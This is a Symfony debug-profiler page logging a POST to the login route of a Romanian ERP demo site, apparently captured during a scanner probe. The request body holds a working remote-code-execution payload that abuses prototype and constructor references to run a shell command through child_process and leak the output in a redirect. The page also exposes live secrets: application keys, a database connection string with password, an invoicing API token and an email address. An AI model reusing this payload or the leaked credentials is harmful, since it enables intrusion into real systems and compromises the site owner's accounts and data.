POST https://demo3.business-erp.ro/login

Response
200 OK
IP
18.184.127.28
Profiled on
Token
6f8a13

UserController :: Login

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0 
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1 
""$@0""
2 
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller 
"App\Controller\UserController::Login"
_route 
"user-login"
_route_params 
[]
_stopwatch_token 
"32d41b"

Request Headers

Header Value
accept 
"*/*"
accept-encoding 
"gzip, deflate"
connection 
"keep-alive"
content-length 
"753"
content-type 
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie 
"PRIMO=2jibmqat2dqkp1fca9e9d9lkhd"
host 
"demo3.business-erp.ro"
next-action 
"x"
user-agent 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-nextjs-html-request-id 
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id 
"b5dce965"
x-php-ob-level 
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Wed, 10 Dec 2025 21:37:32 GMT"
x-debug-token 
"6f8a13"

Cookies

Request Cookies

Key Value
PRIMO 
"2jibmqat2dqkp1fca9e9d9lkhd"

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV 
"dev"
APP_SECRET 
"b6df5ec4eb2362d2950b2463f34f7d54"
CDN_PATH 
"/var/www/demo3/cdn/"
CDN_URL 
"https://cdn.demo3.business-erp.ro/"
COMPANY_ID 
"1"
DATABASE_URL 
"mysql://demoPRIMO:b5qirs6TVqOYfzb@DEMO@95.85.22.239:3306/demo_primo?serverVersion=8.0.31"
PLATFORM_ID 
"1"
SECRET_KEY 
"Ax#Nqm3(z7(5/D-~;|#z7GC0"
SMARTBILL_CIF 
"RO25677624"
SMARTBILL_TOKEN 
"b5cd1fe0b0ff00ed76735cce7c048854"
SMARTBILL_USER 
"eduard.edi.ana@gmail.com"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CONTENT_LENGTH 
"753"
CONTENT_TYPE 
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
DOCUMENT_ROOT 
"/var/www/demo3/www/public"
DOCUMENT_URI 
"/index.php"
FCGI_ROLE 
"RESPONDER"
GATEWAY_INTERFACE 
"CGI/1.1"
HOME 
"/var/www"
HTTPS 
"on"
HTTP_ACCEPT 
"*/*"
HTTP_ACCEPT_ENCODING 
"gzip, deflate"
HTTP_CONNECTION 
"keep-alive"
HTTP_CONTENT_LENGTH 
"753"
HTTP_CONTENT_TYPE 
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
HTTP_COOKIE 
"PRIMO=2jibmqat2dqkp1fca9e9d9lkhd"
HTTP_HOST 
"demo3.business-erp.ro"
HTTP_NEXT_ACTION 
"x"
HTTP_USER_AGENT 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_NEXTJS_HTML_REQUEST_ID 
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID 
"b5dce965"
PATH_INFO 
""
PHP_SELF 
"/index.php"
QUERY_STRING 
""
REDIRECT_STATUS 
"200"
REMOTE_ADDR 
"18.184.127.28"
REMOTE_PORT 
"53958"
REMOTE_USER 
""
REQUEST_METHOD 
"POST"
REQUEST_SCHEME 
"https"
REQUEST_TIME 
1765402652
REQUEST_TIME_FLOAT 
1765402652.8483
REQUEST_URI 
"/login"
SCRIPT_FILENAME 
"/var/www/demo3/www/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"188.166.125.198"
SERVER_NAME 
"demo3.business-erp.ro"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SOFTWARE 
"nginx/1.24.0"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET,DATABASE_URL,COMPANY_ID,PLATFORM_ID,SECRET_KEY,CDN_PATH,CDN_URL,SMARTBILL_TOKEN,SMARTBILL_USER,SMARTBILL_CIF"
USER 
"www-data"